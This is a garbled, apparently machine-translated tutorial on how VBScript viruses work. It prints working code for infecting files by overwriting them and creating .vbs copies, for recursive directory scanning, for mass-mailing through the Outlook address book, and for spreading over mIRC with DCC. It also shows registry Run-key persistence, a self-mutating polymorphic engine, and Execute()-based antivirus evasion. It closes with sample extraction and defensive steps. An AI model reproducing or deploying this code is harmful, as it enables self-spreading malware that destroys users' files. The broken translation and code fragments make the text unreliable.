Describe how the virus file is infected with normal file: First assume the virus itself to the string variable VBSCopy, then overwrite this string to the target file, and create a file named file name prefix with the target file, VBS A copy, finally delete the target file.
Code:
Set fso = createObject ("scripting.filesystemObject") 'Create a file system object set self = fso.opentextFile (wscript.scriptfullname, 1)' Read the current file (ie virus itself) vbscopy = self.readall = Self.Readall 'Read the virus all code to string variable vbscopy ... set ap = fso.opentextfile (target file .path, 2, true)' write open target file, prepare to write virus code ap.write vbscopy 'Cover the target file ap.close set cop = fso.getfile (Target file .path) ' to get the target file path Cop.copy (Target file .path & ".vbs") 'Create another one The virus file (with .vbs served as a suffix) target file. Delete (true) 'Delete the target file
This function is primarily used to find files that meet the conditions and generate a viral copy of the corresponding file.
Code:
SUB SCAN (Folder_) ON Error Resume Next Set Folder_ = fso.getfolder (Folder_) Set Files = Folder_.files for Each File In Files Ext = Fso.GETEXTENSIONNAME (File) Ext = LCase (EXT) IF EXT = "Ini" THEN Wscript.echo (file) end if next set subfolders = folder_.subfolders for Each Subfolder in Subfolders Scan () Scan (Subfolder) Next End Sub
Looking for the current printer connection and network sharing connection and display the script programs
Code:
on error resume next welcome_msg = "Search network connection test" Set WSHNetwork = WScript.CreateObject ( "WScript.Network") Set oPrinters = WshNetwork.EnumPrinterConnections WScript.Echo "Network printer mappings:" For i = 0 to oPrinters.Count-1 Step 2 WScript.echo "Port" & opters.Item (i) & "=" & oprinters.item (i 1) Next set cost -drives = wshnetwork.enumnetworkDrives if Coldrives.count = 0 Then MsgBox "There is no can be listed." , vbInformation vbOkOnly, welcome_msg Else strMsg = "current network drive connection:" & CRLF For i = 0 To colDrives.Count-1 Step 2 strMsg = strMsg & Chr (13) & colDrives (i) & colDrives (i 1) Next MsgBox strMsg, vbInformation Vbokonly, Welcome_msg End IF reference:
Second, VBS script virus principle analysis 1. How to infect VBS script viruses, search file VBS script virus is generally directly infected with files, viruses, most of the code in the virus can be attached to the middle of other similar programs, such as new happy time viruses can put their own code Attached to the tail of the .htm file and add a statement that calls the virus code at the top, and the love virus is a copy of the file to generate a copy of the file, copy the virus code into it, and the original file name as the prefix of the virus file name. VBS as a suffix. Below we are specific to some code of the love virus to analyze the infection and search principle of such viruses: The following is some of the key code for file infection: set fso = createObject ("scripting.filesystemObject") 'Create a file system object set self = Fso.opentextFile (WScript.scriptFullname, 1) 'Read the current file (ie virus itself) vbscopy = self.readall' Read the virus all code to string variable VBScopy ... set ap = fso.opentextfile (Target file .path, 2, true) 'Write the target file, ready to write viral code ap.write vbscopy' to overwrite the target file ap.close set cop = fso.getfile (Target) File .Path) 'Get the target file path Cop.copy (Target file .path & ".vbs") ' Create another virus file (with .vbs served as a suffix) target file. Delete (true) 'Deleting the target file describes how the virus file is infected with normal file: first assign the virus itself to the string variable vbscopy, then overwritten this string to the target file, and create a target file name File name prefix, VBS is a replica of the suffix, and finally deletes the target file. Below we specific to analyze the file search code: 'This function is mainly used to find a file that meets the condition, and generates a viral copy of the corresponding file SUB SCAN (Folder_) 'scan function definition, on error resume next "If there is Error, skipping directly, prevent pop-out error window SET FOLDER_ = fso.getfolder (folder_) set files = folder_.files 'Current Directory All file collection for Each file in filesext = fso.GETEXTENSIONNAME (file) ' Get file suffix ext = lcase (ext) 'suffix name Convert to lowercase letters if ext = "mp5" then' If the retrore is MP5, infection is performed. Please build the files of the corresponding retrore, it is best to make a bad hyperfix name so as not to destroy the normal procedure. WScript.ech Subfolders = folder_.subfolders for Each Subfolder In Subfolders 'Search for other directories; recursive calls scan () scan (Subfolder) Next End Sub's code is the VBS script virus for file search Code analysis. Search section of the SCAN () function is relatively short, very clever, and uses a recursive algorithm to traverse the entire partition directory and file.
2. VBS script viruses through several ways and code analysis of VBS script viruses are widely propagated, mainly on its network communication function, in general, VBS script viruses use the following ways to spread: 1) via email Accessories Communication This is a very common way of communication. The virus can get legitimate Email addresses through various methods. The most common is to directly take the email address in the Outlook address book, or you can pass the program in user documentation (for example, Search for the Email address in the HTM file). Here we specifically analyze how the VBS script virus is doing this: function mailbroadcast () on error resume next wscript.echo set outlookapp = creteObject ("Outlook.Application") // Create an Outlook Application Object if OutlookApp = " Outlook "TENSET MAPIOBJ = Outlookapp.getnamespace (" MAPI ") // Gets the namespace of MAPI SET Addrlist = Mapiobj.AddressLists // Gets the number of for Each Addr in Addrlist if addr.addressentries. Count = addr.addressentries.count // Get Email records for each address table for addrentIndex = 1 to addrentcount // Traverse address table Email address set item = OutlookApp.createItem (0) // Get a mail object instance set address = addr.addressentries (addrentIndex) // Get specific email address item.to = addrent.address // Fill in the recipient address item.subject = "viral spread experiment " // write mail title item.body =" This is a virus mail propagation test, and it is not a panic! " // Write file content set attachments = item.attachments // Define email attachment Attachments. Add filesysobj.getspecialfolder (0) & "/ test.jpg.vbs" Item.DeleteafTERSUBMIT = TRUE // Automatically delete if item.to <> "" "Item.send " // Send MailObj.Regwrite "HKCU / Software / MailTest / MAILED", "1" // virus tag to avoid repeated infection END IF next end if next end if End Function 2) General Domain Web Sharing Communication LAN sharing propagation is also a very common and efficient network propagation method. In general, in order to communicate in the LAN, there must be many shared directories, and have optional permissions, such as Win2000 creation sharing, the default is to have writable rights. Such a virus can spread the virus code into these directories by searching for these shared directories. In VBS, there is an object to implement a search and file operation of the online neighbor sharing folder. We use this object to achieve the purpose of propagation.
welcome_msg = "Search network connection test" Set WSHNetwork = WScript.CreateObject ( "WScript.Network") 'create a network object Set oPrinters = WshNetwork.EnumPrinterConnections' create a network printer connections list WScript.Echo "Network printer mappings:" For i = 0 to oprinters.count - 1Step2 'Display network printer connection WScript.echo "Port" & oprinters.Item (i) & "=" & oprinters.Item (i 1) Next Set Coldrives = WSHNetwork.enumNetworkDrives' creation A network shared connection list if Coldrives.count = 0 THEN MSGBOX "There is no driveable drive.", Vbinformation vbokonly, Welcome_msg else strmsg = "Current network drive connection:" & crlf fori = 0to Coldrives.count - 1 Step 2 strmsg = strmsg & chr (13) & chr (10) & Coldrives (i) & chr (9) & Coldrives (i 1) Next Msgbox strmsg, vbinformation vbokonly, Welcome_Msg 'Display the current network drive connection END IF is a for the current Printer connection and network sharing connection and display the full script program. After you know the shared connection, we can read and write files directly. 3) By infection with web files such as HTM, ASP, JSP, PHP, WWW services have become very common, viruses must cause all users such as HTM, which will cause all users who have visited the webpage infectious virus. The reason why viruses can play a powerful function in the HTM document, using the same principle as the vast majority of web malicious code. Basically, they use the same code, but other code can be used, this code is the key to the virus FSO, WSH and other objects to run in the web page. In the Registry HKEY_CLASES_ROOT / CLSID / we can find such a primary key, the registration table is "Windows Script Host Shell Object", and we can also find it, the registry is "FileSystem Object" Generally, the COM will be initialized. After obtaining the corresponding component object, the virus can correctly use the FSO, WSH object, and call their powerful functions. Code as follows: Set Apple0bject = document.applets ( "KJ_guest") Apple0bject.setCLSID ( "") Apple0bject.createInstance () 'creates an instance of Set WsShell Apple0bject.Get0bject () Apple0bject.setCLSID ( "" Apple0bject.createInstance () 'Creates an instance set fso = apple0bject.get0bject () For other types of files, this is no longer an analysis.
4) Transfer viruses through IRC chat through IRC propagation generally uses the following code (as an example of MIRC) DIM MIRC SET FSO = CreateObject ("scripting.filesystemObject") set mirc = fso.createtextfile ("c: / mirc / script .ini ") 'creation file script.ini fso.copyfile wscript.scriptfullname," c: /mirc/attachment.vbs ", True' backs up the viral file to attachment.vbs mirc.writeline" [script] "mirc.writeline" N0 = on 1: join: *. *: {IF ($ Nick! = $ ME) / DCC Send $ Nick C: /Mirc/attachment.vbs} "Using Command / DDC Send $ Nick Attachment.VBS to the channel Other users transfer virus files mirc.close above the code to write a row code in the Script.ini file, and there will be many other code. Script.ini stores commands used to control the IRC session, which can be performed automatically. For example, the "otter" virus Tune.vbs will modify C: /Mirc/Script.ini and C: /mirc/mirc.ini, so that whenever IRC users use infected channels, they receive a DDC. Tune.vbs. Similarly, if PIRCH98 is installed in the C: / PIRCH98 directory of the target computer, the virus will modify C: /PIRCH98/Events.ini and C: /PIRCH98/Pirch98.ini, so that whenever IRC users use infected channels They will receive a Tune.vbs sent via DDC. In addition, viruses can also be propagated through a wide popular Kazaa. The virus copies the virus file into the default shared directory of Kazaa, so that when other users access this machine, it is possible to download the virus file and execute. This propagation method may take action with the popularity of Kazaa's point-to-point sharing tool. There are some other propagation methods, we will not be one by one here. 3. How does the VBS script virus get control rights to get control? This is a more interesting topic, while the VBS script virus seems to play this topic. The author listed several typical methods here: 1) Modifying the registry key Windows When starting, you will automatically load the key values of the key values under the hkey_local_machine / suftware / run item under the startup. Script virus can join a key value to point to virus programs under this, so that the control will be guaranteed when the machine is started. The method of modifying the reservoir is relatively simple, and can call the following statement directly. Wsh.RegWrite (Strname, AnyValue [, Strty]) 2) A modification of the DLL execution mode is modified to WScript.exe by mapping file execution. You can even point the map of the EXE file to virological code. 3) Deceive users, let users do this in this way. In fact, it is actually related to the user's psychology. For example, the virus uses a two-suffix file name when sending an accessory. Since the suffix is not displayed by default, an example is displayed as beauty.jpg, when the user is often Will treat it as a picture to click.
Similarly, for the user's own disk, the virus is infected, the file name of the original file is used as a prefix, and the VBS produces a viral file as a suffix, and deletes the original file, so that the user may put this VBS file. See the original file run. 4) Desktop.ini and Folder.htt Multi-mutually mutually use of these two files to configure the movie desktop or from the definition folder. If the user's directory contains these two files, the viral code in Folder.htt is triggered when the user enters the directory. This is a method of more effective acquisition control using a new joyful time virus. And using Folder.htt, it is also possible to trigger an EXE file, which may also become an effective way to get control of the virus! There are still many ways to obtain control of the virus, and the rest of this is also relatively large. 4. VBS script viruses against anti-virus software have to survive, and the ability to prevent anti-virus software is also required. In general, the VBS script virus uses the following methods for anti-virus software: 1) Self-encryption, such as, new happy time virus, which can randomly select the key to encrypt your own code, so that each infected virus The code is different, reaching the effect of polymorphism. This brings some difficulties to the traditional feature value. The virus can also be further used in deformation techniques such that the code after the decryption of the encrypted virus after infection is different. Let's look at a simple modification vbs script engine (from flyshadow) Randomize Set Of = CreateObject ( "Scripting.FileSystemObject") 'to create a file system object vC = Of.OpenTextFile (WScript.ScriptFullName, 1) .Readall' read its own code FS = Array ("of", "VC", "fs", "fsc") 'Defines an array for FSC = 0 to 3 vc = Replace (VC, FS (FSC), CHR ((int)) (RND * 22) 65)) & chr ((IND * 22) 65) & chr ((IND * 22) 65) & chr ((int (INT * 22) 65) )) 'Take 4 random characters to replace the string next of.opentextfile (WScript.scriptfullname, 2, 1) .writeline VC' writes the replacement code back to the file above this VBS file in each After running, its OF, VC, FS, FSC four strings are replaced with a random string, which greatly prevents the anti-virus software from being isolated using a feature value to test it. 2) Smart Whether to use the Execute function to use the VBS program to use the VBS program, if you use the FileSystemObject object in a normal program, some anti-virus software will report the risk of this VBS file when scanning this program. High, but some VBS script viruses also use the FileSystemObject object, why don't you warn? The reason is very simple, because these viruses are cleverly use the Execute method. Some anti-virus software detects the VBS virus, it will check if the file in the program uses the FileSystemObject object. If it is adopted, this will issue alarm. If the virus converts this declaration code into a string, then execute through the Execute (String) function, you can avoid some anti-virus software.
3) Change the declaration method of certain objects, such as fso = createObject ("scripting.filesystemObject"), we change to fso = createObject ("script" "ing.filesystem " mobject ") so that anti-virus software It will not find the FileSystemObject object when it is static scan. 4) Directly turn off the anti-virus software VBS script function power, it can be directly compared to the process name directly, if it is discovered to be anti-virus software, and some key programs are deleted. 5. The principle of VBS virus production machine describes that the so-called virus production machine refers to software that can directly produce a disease source code according to the user's choice. In many people, this may be incredible, in fact, its implementation is very simple for script viruses. The scripting language is interpreted, does not need to be compiled, no checksum positioning in the program, and the separation between each statement is relatively clear. In this way, the virus function is first made into a number of separate modules. After the user is selected, the production machine only needs to patch up the corresponding function module, and finally make the corresponding code replacement and optimization. Due to space relationships and other reasons, this is not described in detail. Third, how to prevent VBS script virus 1. How to extract (encryption) script virus from samples For no encrypted script viruses, we can find directly from viral samples, now introduce how to extract encrypted VBS script viruses from viral samples, here we take new happy time as an example. Open Folder.htt with Jediedit. We found this file to have a total of 93 lines, the first line
Mlibl ^ GB`P) CPK ...; later omitted, A long! 89: Execute ("Dim Keyarr (3), thistext" & vbcrlf & "keyarr (0) = 3" & vbcrf & "keyarr (1) = 3" & vbcrf & "keyarr (2) = 3" & vbcrf & "keyarr (3) = 4 "& vbCrLf &" For i = 1 To Len (ExeString) "& vbCrLf &" TempNum = Asc (Mid (ExeString, i, 1)) "& vbCrLf &" If TempNum = 18 Then "& vbCrLf &" TempNum = 34 "& vbCrLf &" End If "& vbCrLf & "TempChar = Chr (TempNum KeyArr (i Mod 4))" & vbCrLf & "If TempChar = Chr (28) Then" & vbCrLf & "TempChar = vbCr" & vbCrLf & "ElseIf TempChar = Chr (29) Then" & vbCrLf & "TempChar = vbLf" & vbCrLf & "Endiff" & Vbcrf & "thistext = thistext") 90: Execute (thistext) 91: No. 87 and 91 lines do not explain, the 88th line is the assignment of a string, it is obvious This is a virus code encrypted. Take a look at the last code of the 89 line for thistext = thistext & tempchar, plus the following line, we must guess the virus decryption code in thistext (the brothers who are familiar with VBS are of course also You can analyze this decryption code, to Simple! Even if you don't look at the code, you should be able to see). The 90th is the code that performs the code just in THISTEXT (after decrypting code). So, next step What should I do? It's very simple. We can solve the content of thistext to a text file after the virus code is decrypted. Since the above line is VBScript, I created the following .txt file: First, COPY 88,89 Two lines to the Journey established .txt file, of course, if you are willing to look at the effect of the new joy, you can also enter the 90th line.Then enter the following line to create a file and write thisText to the file VBS code. The entire file is as follows: Exestring = "Afi ... '88 line code Execute (" Dim Keyar ...' No. 89 line code set fso = CreateObject ("scripting.filesystemObject") 'Creates a file system object set virusfile = fso.createtextFile ("Resource.log", create a new file resource.log to store the decrypted virus code virusfile.writeline THisText) 'Write the decrypted code to resource.log ok! This is as simple, save the file, change the file suffix .txt to .vbs (.vbe can also be), double click, you will find more A file resource.log, open this file, how is it? Is it "new happy time" source code! 2. VBS script virus weakness VBS script virus is a script, so it doesn't work like a PE file It is convenient and flexible, and its operation is required for conditions (but this condition is available by default). The author believes that the VBS script virus has the following weaknesses: 1) Most VBS script viruses need to use an object : FILESYSTEMOBJECT 2) The VBScript code is performed by Windows Script Host. 3) The operation of the VBS script virus requires support for WScript.exe for its associated program. 4) Viruses that are propagated through web pages require ActiveX's support 5) Viruses propagated through Email requires OE automatic send mail function support, but most of the viruses are mainly propagated in email. 3. How to prevent and release the VBS script virus for the weakness of the VBS script virus mentioned above, the author proposes the following centralized prevention measures: 1) Disable file system object FileSystemObject method: Use regsvr32 scrrun.dll / u This command can prohibit file system objects. . Where REGSVR32 is an executable of Windows / System. Or look at the Scrrun.dll file to delete or change your name. Another way is to find a primary key in HKEY_CLASSES_ROOT / CLSID / under the registry, click. 2) Uninstalling Windows Scripting Host in Windows 98 (NT 4.0 or above), open [Control Panel] → [Add / Remove Programs] → [Windows Installer] → [Accessory], cancel the "Windows Scripting Host". Like the above method, find a primary key in HKEY_CLASSES_ROOT / CLSID / under the registry, 咔嚓. 3) Delete the VBS, VBE, JS, JSE files, and the name of the embellished name and application Click [My Computer] → [View] → [Folder Selection] → [File Type], then delete VBS, VBE, JS, JSE file The reproduction name is mapped with the application.
